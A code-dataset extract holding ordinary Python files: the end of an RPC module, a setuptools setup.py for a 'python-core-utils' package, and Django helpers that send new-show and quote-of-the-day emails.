        except JsonTypeError as e:
            # TypeErrors from j2py should be ValueError really
            raise ValueError("reconstructed types do not match") from e
# Convenience alias so functions can be wrapped as ``rpcmethod(func)``.
rpcmethod = RpcMethod.from_function
| 34.118812 | 83 | 0.591991 | 3,322 | 0.964016 | 0 | 0 | 166 | 0.048172 | 0 | 0 | 929 | 0.269588 |
eacbb51236c58c13c95ec1f889b714733a550d0d | 1,567 | py | Python | setup.py | ajaniv/python-basic-utils | d8217e58030f8cc7d6a59a14e438eb700a2492f1 | [
"MIT"
] | null | null | null | setup.py | ajaniv/python-basic-utils | d8217e58030f8cc7d6a59a14e438eb700a2492f1 | [
"MIT"
] | 4 | 2016-12-23T18:46:54.000Z | 2018-08-30T19:31:31.000Z | setup.py | ajaniv/python-core-utils | d8217e58030f8cc7d6a59a14e438eb700a2492f1 | [
"MIT"
] | null | null | null | """A setuptools based setup module.
See:
https://packaging.python.org/en/latest/distributing.html
"""
from setuptools import setup, find_packages
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))

# Long description comes from the README so PyPI can render it.
with open(path.join(here, 'README.rst'), encoding='utf-8') as f:
    long_description = f.read()

setup(
    name='python-core-utils',
    version='0.5.0',
    description='Python core utility functions',
    long_description=long_description,
    url='https://github.com/ajaniv/python-core-utils',
    author='Amnon Janiv',
    author_email='amnon.janiv@ondalear.com',
    license='MIT',
    # See https://pypi.python.org/pypi?%3Aaction=list_classifiers
    classifiers=[
        # How mature is this project? Common values are
        #   3 - Alpha
        #   4 - Beta
        #   5 - Production/Stable
        # Fixed: 'Development Status :: 4 - Alpha' is not a valid trove
        # classifier (4 is Beta) and is rejected by PyPI on upload.
        'Development Status :: 4 - Beta',
        'Intended Audience :: Developers',
        'Topic :: Software Development :: Libraries :: Python Modules',
        'License :: OSI Approved :: MIT License',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3.5',
        'Programming Language :: Python :: 3.6',
        'Programming Language :: Python :: 3.7'
    ],
    keywords='python core utility functions',
    packages=find_packages(exclude=['contrib', 'docs', 'tests']),
    install_requires=['Pillow>=4.1.1',
                      'docutils>=0.14'],
    extras_require={
        'dev': ['check-manifest'],
        'test': ['coverage'],
    },
    test_suite='tests'
)
| 29.566038 | 71 | 0.623484 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 877 | 0.559668 |
eacbdadce424c8674d1462fffb1cb970c545200c | 2,506 | py | Python | emails/utils.py | jmhubbard/quote_of_the_day_custom_user | 27024b2953c1c94fd2970563c3ab31ad444912b6 | [
"Unlicense"
] | 1 | 2020-11-25T04:57:16.000Z | 2020-11-25T04:57:16.000Z | emails/utils.py | jmhubbard/quote_of_the_day_custom_user | 27024b2953c1c94fd2970563c3ab31ad444912b6 | [
"Unlicense"
] | null | null | null | emails/utils.py | jmhubbard/quote_of_the_day_custom_user | 27024b2953c1c94fd2970563c3ab31ad444912b6 | [
"Unlicense"
] | null | null | null | import os
from django.core.mail import send_mail
from django.urls import reverse
from django.contrib.sites.models import Site
from django.template.loader import render_to_string
def email_all_users_an_email(user, showlist):
    """Send the "New Shows Added" notification to *user*.

    Renders text and HTML bodies from the email_all_users templates with
    *showlist* and an "unsubscribe" link.  NOTE(review): the link is
    built from reverse('login'), i.e. it points at the login page --
    confirm this is intended.  Returns send_mail's sent-message count.
    """
    domain = Site.objects.get_current().domain
    login_path = reverse('login')
    unsubscribe_url = 'http://{domain}{path}'.format(domain=domain, path=login_path)
    context = {"unsubscribe_uri": unsubscribe_url, "showlist": showlist}
    text_body = render_to_string("emails/email_all_users.txt", context=context)
    html_body = render_to_string("emails/email_all_users.html", context=context)
    return send_mail(
        "New Shows Added",
        text_body,
        os.getenv("EMAIL_HOST_USER"),
        [user],
        fail_silently=False,
        html_message=html_body,
    )
def email_test(user, message):
    """Send a plain "Quote test" email containing *message* to *user*.

    Now returns send_mail's count of delivered messages, matching the
    other helpers in this module (the original discarded it; existing
    callers that ignore the return value are unaffected).
    """
    return send_mail(
        'Quote test',
        message,
        os.getenv("EMAIL_HOST_USER"),
        [user],
        fail_silently=False,
    )
def email_daily_tv_quote(quote, user):
    """Email a TV *quote* to *user* as the "Quote Of The Day".

    Renders the tv_email text/HTML templates; the "unsubscribe" link is
    the current site's domain plus the login URL (NOTE(review): confirm
    that target is intended).  Returns send_mail's sent-message count.
    """
    domain = Site.objects.get_current().domain
    login_path = reverse('login')
    unsubscribe_url = 'http://{domain}{path}'.format(domain=domain, path=login_path)
    context = {"unsubscribe_uri": unsubscribe_url, "quote": quote}
    text_body = render_to_string("emails/tv_email.txt", context=context)
    html_body = render_to_string("emails/tv_email.html", context=context)
    return send_mail(
        "Quote Of The Day",
        text_body,
        os.getenv("EMAIL_HOST_USER"),
        [user],
        fail_silently=False,
        html_message=html_body,
    )
def email_daily_movie_quote(quote, user):
    """Email a movie *quote* to *user* as the "Quote Of The Day".

    Renders the movie_email text/HTML templates; the "unsubscribe" link
    is the current site's domain plus the login URL (NOTE(review):
    confirm that target is intended).  Returns send_mail's sent-message
    count.
    """
    domain = Site.objects.get_current().domain
    login_path = reverse('login')
    unsubscribe_url = 'http://{domain}{path}'.format(domain=domain, path=login_path)
    context = {"unsubscribe_uri": unsubscribe_url, "quote": quote}
    text_body = render_to_string("emails/movie_email.txt", context=context)
    html_body = render_to_string("emails/movie_email.html", context=context)
    return send_mail(
        "Quote Of The Day",
        text_body,
        os.getenv("EMAIL_HOST_USER"),
        [user],
        fail_silently=False,
        html_message=html_body,
    )